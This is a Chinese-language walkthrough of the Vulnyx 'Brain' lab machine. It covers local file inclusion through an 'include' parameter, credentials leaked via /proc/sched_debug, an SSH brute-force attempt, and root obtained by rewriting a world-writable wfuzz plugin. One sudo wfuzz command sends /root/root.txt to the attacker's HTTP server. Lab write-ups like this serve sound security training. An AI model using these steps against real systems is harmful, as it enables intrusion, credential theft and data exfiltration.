Vulnyx-Brain-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.213  08:00:27:e6:6e:9d       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e5:e5:eb       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.087 seconds (122.66 hosts/sec). 4 responded
❯ export ip=192.168.60.213
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
To scan or not to scan? That is the question.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.213:22
Open 192.168.60.213:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-27 12:01 CST
Initiating ARP Ping Scan at 12:01
Scanning 192.168.60.213 [1 port]
Completed ARP Ping Scan at 12:01, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:01
Completed Parallel DNS resolution of 1 host. at 12:01, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 12:01
Scanning 192.168.60.213 [2 ports]
Discovered open port 80/tcp on 192.168.60.213
Discovered open port 22/tcp on 192.168.60.213
Completed SYN Stealth Scan at 12:01, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.213
Host is up, received arp-response (0.00091s latency).
Scanned at 2025-02-27 12:01:10 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:E6:6E:9D (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

扫一下目录

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.213
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 361]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

得到有个index.php

LFI文件包含

猜测有LFI漏洞

尝试模糊测试，得到参数include

❯ wfuzz -c -u "http://$ip/index.php?FUZZ=/etc/passwd"  -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt --hw 26
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.213/index.php?FUZZ=/etc/passwd
Total requests: 207643

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000001059:   200        33 L     64 W       1750 Ch     "include"

curl一下，得到用户名ben

❯ curl "$ip/index.php?include=/etc/passwd"
<pre>
runnable tasks:
 S           task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-----------------------------------------------------------------------------------------------------------
 S        systemd     1      2927.102286      1731   120         0.000000       509.025216         0.000000 0 0 /
</pre>

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ben:x:1000:1000:ben,,,:/home/ben:/bin/bash

尝试hydra爆破一下

出不来

❯ hydra -l ben -P /usr/share/wordlists/rockyou.txt ssh://$ip -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-27 12:25:09
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.60.213:22/
[STATUS] 226.00 tries/min, 226 tries in 00:01h, 14344179 to do in 1057:50h, 10 active
[STATUS] 190.67 tries/min, 572 tries in 00:03h, 14343833 to do in 1253:50h, 10 active
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.

内核调度信息

只能从LFI方向入手了，寻找有价值的文件

再次wfuzz利用-ss参数正则过滤一下，包含ben的

虽然还是有很多，但我凭感觉很多文件也不用读，根据文件名来判断

❯ wfuzz -c -u "http://$ip/index.php?include=/FUZZ"  -w /usr/share/seclists/Discovery/Web-Content/LinuxFileList.txt --ss "ben" --hw 26
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.213/index.php?include=/FUZZ
Total requests: 87018

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000215:   200        41 L     62 W       2483 Ch     "etc/ssl/certs/Izenpe.com.pem"
000000192:   200        41 L     62 W       2483 Ch     "etc/ssl/certs/cc450945.0"
000000500:   200        3519 L   3812 W     214281 Ch   "etc/ssl/certs/ca-certificates.crt"
000000611:   200        428 L    1347 W     10407 Ch    "etc/grub.d/00_header"
000000734:   200        60 L     79 W       1048 Ch     "etc/group"
000001005:   200        688 L    9070 W     243358 Ch   "etc/alternatives/pico"
000001164:   200        688 L    9070 W     243358 Ch   "etc/alternatives/editor"
000001636:   200        60 L     79 W       1073 Ch     "etc/group-"
000002409:   200        585 L    2584 W     19135 Ch    "etc/services"
000002729:   200        86023    86042 W    835048 Ch   "etc/dictionaries-common/words"
                        L
000002887:   200        33 L     64 W       1750 Ch     "etc/passwd"
000002916:   200        33 L     64 W       1758 Ch     "etc/passwd-"
000003123:   200        2718 L   30871 W    900908 Ch   "sbin/ldconfig"
000003197:   200        105023   1030124    31818627    "var/cache/apt/srcpkgcache.bin"
                         L       W          Ch
000003663:   200        10635    231792 W   1952533 C   "var/cache/debconf/templates.dat-old"
                        L                   h
000003662:   200        10635    231792 W   1952533 C   "var/cache/debconf/templates.dat"
                        L                   h
000004036:   200        232 L    22807 W    253170 Ch   "var/cache/man/es/index.db"
000004030:   200        21 L     2154 W     24848 Ch    "var/cache/man/de/index.db"
000004072:   200        272 L    26885 W    294817 Ch   "var/cache/man/index.db"
000003644:   200        105045   1030662    31819012    "var/cache/apt/pkgcache.bin"
                         L       W          Ch
000004242:   200        8478 L   40057 W    355350 Ch   "var/backups/dpkg.status.0"
000004506:   200        38 L     181 W      136275 Ch   "var/log/wtmp"
000005111:   200        233 L    1274 W     17143 Ch    "var/lib/dpkg/info/bash-completion.postinst"
000005608:   200        1232 L   17294 W    130653 Ch   "var/lib/dpkg/info/console-setup.templates"
000005754:   200        1203 L   24100 W    219680 Ch   "var/lib/dpkg/info/tzdata.templates"
000005821:   200        37849    148361 W   1806202 C   "var/lib/dpkg/info/keyboard-configuration.config"
                        L                   h
000005955:   200        1159 L   11554 W    93263 Ch    "var/lib/dpkg/info/dictionaries-common.templates"
000006548:   200        201 L    1179 W     16171 Ch    "var/lib/dpkg/info/bash-completion.prerm"
000007002:   200        224 L    1234 W     16708 Ch    "var/lib/dpkg/info/bash-completion.postrm"
000007299:   200        235 L    1269 W     17049 Ch    "var/lib/dpkg/info/bash-completion.preinst"
000007326:   200        459 L    2831 W     23047 Ch    "var/lib/dpkg/info/ssl-cert.templates"
000007512:   200        72 L     712 W      6179 Ch     "var/lib/dpkg/info/apparmor.templates"
000007966:   200        180 L    3173 W     22592 Ch    "var/lib/dpkg/info/man-db.templates"
000008228:   200        3520 L   49730 W    408610 Ch   "var/lib/dpkg/info/keyboard-configuration.templates"
000008785:   200        1328 L   12825 W    99036 Ch    "var/lib/dpkg/info/debconf.templates"
000009373:   200        3712 L   46326 W    331816 Ch   "var/lib/dpkg/info/grub-pc.templates"
000010030:   200        454 L    920 W      35982 Ch    "var/lib/dpkg/info/bash-completion.md5sums"
000010730:   200        82 L     229 W      2493 Ch     "var/lib/dpkg/info/grub-pc.postrm"
000011296:   200        249 L    2649 W     22202 Ch    "var/lib/dpkg/info/ucf.templates"
000011789:   200        120 L    643 W      4745 Ch     "var/lib/dpkg/info/dbus.postinst"
000012141:   200        370 L    3931 W     31497 Ch    "var/lib/dpkg/info/libpam-runtime.templates"
000012260:   200        699 L    718 W      32310 Ch    "var/lib/dpkg/info/bash-completion.list"
000012602:   200        8478 L   40057 W    355350 Ch   "var/lib/dpkg/status"
000012601:   200        8480 L   40061 W    355342 Ch   "var/lib/dpkg/status-old"
000012890:   200        21738    86817 W    611156 Ch   "var/lib/usbutils/usb.ids"
                        L
000013581:   200        230 L    804 W      8423 Ch     "boot/grub/grub.cfg"
000013650:   200        36 L     229 W      7260 Ch     "boot/grub/i386-pc/luks.mod"
000013689:   200        24 L     202 W      6113 Ch     "boot/grub/i386-pc/loadenv.mod"
000013804:   200        32 L     367 W      10292 Ch    "boot/grub/i386-pc/cryptodisk.mod"
000013919:   200        164 L    1229 W     12761 Ch    "proc/sched_debug"
000084424:   200        688 L    9070 W     243358 Ch   "bin/nano"
000084416:   200        156 L    1080 W     43813 Ch    "bin/cat"
000084535:   200        688 L    9070 W     243358 Ch   "bin/rnano"

Total time: 44.82363
Processed Requests: 87018
Filtered Requests: 86965
Requests/sec.: 1941.341

在/proc/sched_debug文件中得到了用户凭证ben:B3nP4zz

❯ curl "$ip/index.php?include=/proc/sched_debug"
<pre>
runnable tasks:
 S           task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-----------------------------------------------------------------------------------------------------------
 S        systemd     1      2927.102286      1731   120         0.000000       509.025216         0.000000 0 0 /
</pre>

Sched Debug Version: v0.11, 4.19.0-23-amd64 #1
ktime                                   : 2109180.881277
sched_clk                               : 2109114.562493
cpu_clk                                 : 2109108.556545
jiffies                                 : 4295419545
sched_clock_stable()                    : 1

sysctl_sched
  .sysctl_sched_latency                    : 6.000000
  .sysctl_sched_min_granularity            : 0.750000
  .sysctl_sched_wakeup_granularity         : 1.000000
  .sysctl_sched_child_runs_first           : 0
  .sysctl_sched_features                   : 4118331
  .sysctl_sched_tunable_scaling            : 1 (logaritmic)

cpu#0, 3686.400 MHz
  .nr_running                    : 3
  .load                          : 3145728
  .nr_switches                   : 1438966
  .nr_load_updates               : 524046
  .nr_uninterruptible            : 0
  .next_balance                  : 4294.892296
  .curr->pid                     : 677
  .clock                         : 2109108.696792
  .clock_task                    : 2109108.696792
  .cpu_load[0]                   : 0
  .cpu_load[1]                   : 0
  .cpu_load[2]                   : 0
  .cpu_load[3]                   : 0
  .cpu_load[4]                   : 0
  .avg_idle                      : 1000000
  .max_idle_balance_cost         : 500000

cfs_rq[0]:/
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 45197.752305
  .min_vruntime                  : 45200.752305
  .max_vruntime                  : 45200.752305
  .spread                        : 3.000000
  .spread0                       : 0.000000
  .nr_spread_over                : 0
  .nr_running                    : 3
  .load                          : 3145728
  .runnable_weight               : 3145728
  .load_avg                      : 82
  .runnable_load_avg             : 81
  .util_avg                      : 40
  .util_est_enqueued             : 29
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 0
  .throttled                     : 0
  .throttle_count                : 0

rt_rq[0]:
  .rt_nr_running                 : 0
  .rt_nr_migratory               : 0
  .rt_throttled                  : 0
  .rt_time                       : 0.000000
  .rt_runtime                    : 950.000000

dl_rq[0]:
  .dl_nr_running                 : 0
  .dl_nr_migratory               : 0
  .dl_bw->bw                     : 996147
  .dl_bw->total_bw               : 0

runnable tasks:
 S           task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-----------------------------------------------------------------------------------------------------------
 S        systemd     1     45143.173999      2452   120         0.000000      1589.438041         0.000000 0 0 /
 S       kthreadd     2     42926.939316       118   120         0.000000         5.587628         0.000000 0 0 /
 I         rcu_gp     3       118.571759         2   100         0.000000         0.003012         0.000000 0 0 /
 I     rcu_par_gp     4       120.072968         2   100         0.000000         0.002937         0.000000 0 0 /
 I   kworker/0:0H     6      1877.160597         4   100         0.000000         0.102454         0.000000 0 0 /
 I   kworker/u2:0     7     10417.314168        82   120         0.000000         1.616467         0.000000 0 0 /
 I   mm_percpu_wq     8       126.170331         2   100         0.000000         0.002803         0.000000 0 0 /
 R    ksoftirqd/0     9     45197.752305    132791   120         0.000000     22632.345691         0.000000 0 0 /
 I      rcu_sched    10     45197.759654     77450   120         0.000000       397.725220         0.000000 0 0 /
 I         rcu_bh    11       132.172871         2   120         0.000000         0.001940         0.000000 0 0 /
 S    migration/0    12         0.000000       531     0         0.000000        23.247226         0.000000 0 0 /
 S        cpuhp/0    14      2390.402087         9   120         0.000000         0.270836         0.000000 0 0 /
 S      kdevtmpfs    15      2416.502151       148   120         0.000000         1.210340         0.000000 0 0 /
 I          netns    16       144.443039         2   100         0.000000         0.002582         0.000000 0 0 /
 S        kauditd    17      2383.511704         4   120         0.000000         0.028072         0.000000 0 0 /
 S     khungtaskd    18     44970.453657        19   120         0.000000         1.724628         0.000000 0 0 /
 S     oom_reaper    19       149.945486         2   120         0.000000         0.002175         0.000000 0 0 /
 I      writeback    20       151.945978         2   100         0.000000         0.002976         0.000000 0 0 /
 S     kcompactd0    21       153.947482         2   120         0.000000         0.002672         0.000000 0 0 /
 S           ksmd    22       155.950794         2   125         0.000000         0.002928         0.000000 0 0 /
 S     khugepaged    23     45190.873615       209   139         0.000000        20.586764         0.000000 0 0 /
 I         crypto    24       159.948761         2   100         0.000000         0.002703         0.000000 0 0 /
 I    kintegrityd    25       161.948353         2   100         0.000000         0.000763         0.000000 0 0 /
 I        kblockd    26       163.949432         2   100         0.000000         0.002272         0.000000 0 0 /
 I    edac-poller    27       235.870379         2   100         0.000000         0.003288         0.000000 0 0 /
 I     devfreq_wq    28       237.371180         2   100         0.000000         0.002670         0.000000 0 0 /
 S      watchdogd    29         0.000000         2     0         0.000000         0.001788         0.000000 0 0 /
 S        kswapd0    32      1451.903771         3   120         0.000000         0.002929         0.000000 0 0 /
 I       kthrotld    50      1499.024303         2   100         0.000000         0.002362         0.000000 0 0 /
 I  ipv6_addrconf    51      1510.669212         2   100         0.000000         0.000000         0.000000 0 0 /
 I          kstrp    61      1543.280634         2   100         0.000000         0.002966         0.000000 0 0 /
 I        ata_sff    98      1665.542410         2   100         0.000000         0.003864         0.000000 0 0 /
 S      scsi_eh_0   109      1807.335768         4   120         0.000000        35.024347         0.000000 0 0 /
 I     scsi_tmf_0   110      1671.708300         2   100         0.000000         0.002117         0.000000 0 0 /
 S      scsi_eh_1   111      1875.732614        18   120         0.000000        18.275035         0.000000 0 0 /
 S      scsi_eh_2   113      2396.063294        51   120         0.000000         9.422290         0.000000 0 0 /
 I     scsi_tmf_1   114      1673.173460         2   100         0.000000         0.001896         0.000000 0 0 /
 I     scsi_tmf_2   115      1673.566536         2   100         0.000000         0.001691         0.000000 0 0 /
 I   kworker/u2:2   117     45192.737836       566   120         0.000000       139.992237         0.000000 0 0 /
 I   kworker/0:1H   155     45196.053762      3984   100         0.000000       623.217104         0.000000 0 0 /
 I   kworker/u3:0   185      2141.968675         2   100         0.000000         0.001474         0.000000 0 0 /
 S    jbd2/sda1-8   187     45149.089609       988   120         0.000000        89.302385         0.000000 0 0 /
 Iext4-rsv-conver   188      2163.416900         2   100         0.000000         0.002097         0.000000 0 0 /
 Ssystemd-journal   220     45143.747435      7202   120         0.000000      1024.578213         0.000000 0 0 /
 S  systemd-udevd   240     45109.315298       666   120         0.000000        64.713226         0.000000 0 0 /
 Ssystemd-timesyn   257     44348.964777        94   120         0.000000        25.996827         0.000000 0 0 /
 S     sd-resolve   288     10542.881437        22   120         0.000000         2.602704         0.000000 0 0 /
 I       ttm_swap   297      2390.589795         2   100         0.000000         0.003351         0.000000 0 0 /
 S  irq/18-vmwgfx   299         0.000000         3    49         0.000000         0.020887         0.000000 0 0 /
 S    dbus-daemon   302     39165.087993       430   120         0.000000        31.643684         0.000000 0 0 /
 S           cron   305     45141.415737        81   120         0.000000         8.615342         0.000000 0 0 /
 S systemd-logind   306     44349.015937       120   120         0.000000        18.426584         0.000000 0 0 /
 S       rsyslogd   307     42224.395011        87   120         0.000000         6.820937         0.000000 0 0 /
 S    in:imuxsock   317     45142.894486      4899   120         0.000000        90.617334         0.000000 0 0 /
 S      in:imklog   318     10427.553240        11   120         0.000000         6.010143         0.000000 0 0 /
 S  rs:main Q:Reg   322     45142.901728      4916   120         0.000000        86.714084         0.000000 0 0 /
 S           cron   311      2408.015798        40   120         0.000000         5.486087         0.000000 0 0 /
 S             sh   326      2411.557676        10   120         0.000000         2.520946         0.000000 0 0 /
 S    ben:B3nP4zz   334      2417.960198        54   120         0.000000         6.438279         0.000000 0 0 /
 S          sleep   344      2419.956260         3   120         0.000000         1.784380         0.000000 0 0 /
 S       dhclient   349     40955.699589       134   120         0.000000        17.024843         0.000000 0 0 /
 S         agetty   352     40926.763663        20   120         0.000000         3.511291         0.000000 0 0 /
 S           sshd   370     45142.918441      1065   120         0.000000       200.017816         0.000000 0 0 /
 S        apache2   424     45196.420478      2129   120         0.000000       154.609891         0.000000 0 0 /
 S        apache2   596     35938.370222     61495   120         0.000000     12546.197959         0.000000 0 0 /
 S        apache2   598     35938.371761     61283   120         0.000000     12156.942207         0.000000 0 0 /
 S        apache2   614     36021.888817     60104   120         0.000000     11240.450645         0.000000 0 0 /
>R        apache2   677     45199.456701       481   120         0.000000       226.352394         0.000000 0 0 /
 S        apache2   679     35938.372543       405   120         0.000000       195.558113         0.000000 0 0 /
 S        apache2   691     36584.871681       168   120         0.000000        69.766810         0.000000 0 0 /
 S        apache2   692     35938.403125       211   120         0.000000        92.634032         0.000000 0 0 /
 S        apache2   693     35938.375499       151   120         0.000000        77.056777         0.000000 0 0 /
 S        apache2   695     35938.372104       164   120         0.000000        66.376962         0.000000 0 0 /
 S        apache2   696     35938.371011       172   120         0.000000        92.238199         0.000000 0 0 /
 I    kworker/0:1  1038     42930.187897      7419   120         0.000000       737.852032         0.000000 0 0 /
 I    kworker/0:2  1306     45197.089765      1781   120         0.000000       205.988541         0.000000 0 0 /
 R    kworker/0:0  1592     45200.752305      2187   120         0.000000       218.180890         0.000000 0 0 /

LFI2Rce

通过测试发现php过滤器可以显示源码

❯ curl "$ip/index.php?include=php://filter/convert.base64-encode/resource=index.php"
<pre>
runnable tasks:
 S           task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-----------------------------------------------------------------------------------------------------------
 S        systemd     1      2927.102286      1731   120         0.000000       509.025216         0.000000 0 0 /
</pre>

PHByZT4KcnVubmFibGUgdGFza3M6CiBTICAgICAgICAgICB0YXNrICAgUElEICAgICAgICAgdHJlZS1rZXkgIHN3aXRjaGVzICBwcmlvICAgICB3YWl0LXRpbWUgICAgICAgICAgICAgc3VtLWV4ZWMgICAgICAgIHN1bS1zbGVlcAotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQogUyAgICAgICAgc3lzdGVtZCAgICAgMSAgICAgIDI5MjcuMTAyMjg2ICAgICAgMTczMSAgIDEyMCAgICAgICAgIDAuMDAwMDAwICAgICAgIDUwOS4wMjUyMTYgICAgICAgICAwLjAwMDAwMCAwIDAgLwo8L3ByZT4KCjw/cGhwCiAgICAkZmlsZW5hbWUgPSAkX0dFVFsnaW5jbHVkZSddOwogICAgaW5jbHVkZSgkZmlsZW5hbWUpOwo/Pgo=%

那就比上面的稍微简单点了，利用PHP的filters过滤器实现RCE任意代码执行

通过 PHP 过滤器LFI2RCE - HackTricks

HackMyVM-Medusa-Walkthrough | Pepster’Blog

不过从这个方法获取的用户是www-data

之后也可以通过用户进程找到ben的账户凭证

用户提权

ssh连接一下，用户拥有sudo权限

可以利用wfuzz提权

❯ ssh ben@$ip
[email protected]'s password:
Linux brain 4.19.0-23-amd64 #1 SMP Debian 4.19.269-1 (2022-12-20) x86_64
ben@brain:~$ cat user.txt
4be68799a5cef6a6e2b36379e8ae2759
ben@brain:~$ sudo -l
Matching Defaults entries for ben on Brain:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ben may run the following commands on Brain:
    (root) NOPASSWD: /usr/bin/wfuzz

Root提权

但这是模糊测试工具如何提权呢

wufzz有个参数-z可以指定模块

查找wfuzz的模块路径/usr/lib/python3/dist-packages/wfuzz

ben@brain:~$ find / -name wfuzz 2>/dev/null
/usr/lib/python3/dist-packages/wfuzz
/usr/share/wfuzz
/usr/share/doc/wfuzz
/usr/bin/wfuzz

搜寻过后发现有个range.py模块当前用户具有777权限

ben@brain:~$ ls -al /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/
total 88
drwxr-xr-x 3 root root 4096 abr 19  2023 .
drwxr-xr-x 8 root root 4096 abr 19  2023 ..
-rw-r--r-- 1 root root 2053 ene 12  2019 autorize.py
-rw-r--r-- 1 root root 1232 ene 12  2019 bing.py
-rw-r--r-- 1 root root  962 ene 12  2019 buffer_overflow.py
-rw-r--r-- 1 root root 3581 ene 12  2019 burplog.py
-rw-r--r-- 1 root root 7807 ene 12  2019 burpstate.py
-rw-r--r-- 1 root root 1438 ene 12  2019 dirwalk.py
-rw-r--r-- 1 root root 1370 ene 12  2019 file.py
-rw-r--r-- 1 root root 1199 ene 12  2019 guitab.py
-rw-r--r-- 1 root root 1447 ene 12  2019 hexrand.py
-rw-r--r-- 1 root root 1546 ene 12  2019 hexrange.py
-rw-r--r-- 1 root root    0 ene 12  2019 __init__.py
-rw-r--r-- 1 root root 1594 ene 12  2019 ipnet.py
-rw-r--r-- 1 root root 1549 ene 12  2019 iprange.py
-rw-r--r-- 1 root root 1556 ene 12  2019 list.py
-rw-r--r-- 1 root root 3234 ene 12  2019 names.py
-rw-r--r-- 1 root root 1669 ene 12  2019 permutation.py
drwxr-xr-x 2 root root 4096 feb 27 05:39 __pycache__
-rwxrwxrwx 1 root root 1519 abr 19  2023 range.py
-rw-r--r-- 1 root root  699 ene 12  2019 stdin.py
-rw-r--r-- 1 root root 2064 ene 12  2019 wfuzzp.py

直接修改插件内容

python提权即可

ben@brain:~$ vi /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/range.py
import pty
print ("Success!")
pty.spawn("/bin/bash")
ben@brain:~$ cat /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/range.py
import pty
print ("Success!")
pty.spawn("/bin/bash")
ben@brain:~$ sudo /usr/bin/wfuzz -z range 1-2

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

Success!
root@brain:/home/ben# id
uid=0(root) gid=0(root) grupos=0(root)
root@brain:/home/ben# cat /root/root.txt
08c391c2d775390f54ee859d7395ac68

其实更简单的是直接读flag，kali开启http服务，利用root.txt作为字典即可

虽然会有提示编码问题，你在log中还是能看到wfuzz会请求

ben@brain:~$ sudo wfuzz  -u "http://192.168.60.100?FUZZ" -w /root/root.txt                                                                                          

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.100?FUZZ/
Total requests: 1

==================================================================
ID   Response   Lines      Word         Chars          Payload
==================================================================


Unhandled exception: unknown encoding: utf-8,gbk
-----------------------------------------------
❯ tail -f /var/log/nginx/access.log
192.168.60.213 - - [27/Feb/2025:14:31:02 +0800] "GET /?08c391c2d775390f54ee859d7395ac68/// HTTP/1.1" 200 1859 "-" "Wfuzz/2.3.4"
192.168.60.213 - - [27/Feb/2025:14:31:58 +0800] "GET /?08c391c2d775390f54ee859d7395ac68/// HTTP/1.1" 200 1859 "-" "Wfuzz/2.3.4"